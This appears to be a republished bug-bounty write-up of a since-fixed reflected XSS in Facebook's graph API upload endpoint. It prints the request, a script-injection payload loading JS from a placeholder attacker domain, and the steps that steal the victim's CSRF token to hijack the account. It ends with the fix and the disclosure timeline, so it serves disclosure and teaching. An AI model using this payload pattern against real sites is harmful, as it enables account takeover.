Community Learn Tools Library Leisure
search
English
Home > Operation and Maintenance > Safety > Using Reflected XSS Vulnerability to Hijack Facebook Accounts

Using Reflected XSS Vulnerability to Hijack Facebook Accounts

王林
Release: 2019-12-28 17:59:36
forward
3044 people have browsed it

Using Reflected XSS Vulnerability to Hijack Facebook Accounts

Vulnerability situation

This vulnerability is only valid in IE and Edge browsers. The cause of the vulnerability is graph.facebook.com# Some API endpoints in ## do not implement complete and safe escaping measures when processing HTML code responses. The response message is in JSON format, the HTML code is included as the value of one of the fields, and the response message does not come with a Content-Type or X-Content-Type-Options header, so I have the opportunity to use IE/Edge The construction code is executed.

(These two types of browsers scan the entire page to determine the MIME file type, while other browsers only check the first few characters).

Vulnerability Recurrence

1. First, we send a POST request in the following upload method: 

POST /app/uploadsHost: graph.facebook.com access_token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD
Copy after login

ACCESS_TOKEN is a valid user access token generated by the first-party application of Facebook for Android, and PAYLOAD is the HTML code we want to insert to subsequently lure the victim to execute in the browser. When the request is submitted, the remote server will return a value similar to the following, which contains a session ID that will be used later (please refer to Facebook's official instructions for details): 

{"id": "upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"}
Copy after login

After testing, it was found that in the response message There are no Content Security Policy (CSP) restrictions, so I thought about whether I could use a js file containing external links to insert HTML code, for example: 

<html><body><script src=//DOMAIN.com/script.js ></script></body></html>
Copy after login

2. The upload request here is done by the Facebook backend Base64 encoding processing, the return display is as follows, which contains the Payload we specially implanted: 

upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48
Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s
Copy after login

Therefore, after using this encoding string, there will be the following request, which can be used to initiate a POST request to Facebook: 

https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD 
0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?s
ig=ARaCDqLfwoeI8V3s
Copy after login

3. Therefore, using the above request string, I added the valid access_token I generated in step 1, constructed an HTML web page and put it on my website:

Using Reflected XSS Vulnerability to Hijack Facebook Accounts

This page contains a submission style, and the response message after the victim accesses it is as follows: 

{“h”:”2::<html><body><script src=//DOMAIN.com/script.js ></script></body></html>:GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugb
AAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg”}
Copy after login

Importantly,

https://DOMAIN.com/script.js## The script file in # will help me steal the victim's "fb_dtsg" CSRF token, and send one to https://www.facebook.com/api/graphql/ with a mobile phone number or email address Bind the request to achieve indirect victim account hijacking.

Vulnerability Repair

1、在file_type参数中加入对HTML代码处理的安全转义措施;
2、给每个响应中加入“Content-type: application/json” 头避免进一步的攻击。
漏洞上报及处理进程
2019.10.10   漏洞初报
2019.10.10   Facebook确认
2019.10.11    Facebook修复
2019.10.24   Facebook奖励5000$
Copy after login
Recommended related articles and tutorials:

Website Security Tutorial

The above is the detailed content of Using Reflected XSS Vulnerability to Hijack Facebook Accounts. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
xss vulnerability hijack
source:freebuf.com
Previous article:JavaScript prototype chain pollution attack Next article:Exploiting CSRF token verification mechanism vulnerability to authenticate victim accounts
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
vue vee-validate captures the problem of date picker selection The v-model binding on my datepicker field is not working properly. When you make a select...
From 2024-04-06 11:38:56
0
1
510
Color variable changes for each mapped item Tailwind reacts I want that once I add another item to the list, the color of the previous item should not...
From 2024-04-04 00:13:35
0
1
376
How to map Id property to Ulid type using yml file? I'm trying to use a yml file to map the Id property to Symfony\Component\Ulid. This is my ...
From 2024-04-01 20:26:47
0
1
407
How to use multiple React-Bootstrap patterns? I have a react bootstrap schema in which I map my data, but the problem is that when I cli...
From 2024-04-01 17:22:14
0
1
338
Google Workspace Archiving in Moodle I built a simple MoodleLMS, I added GoogleAuth for login, only users in my GoogleWorkspace...
From 2024-04-01 11:53:56
0
1
324
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template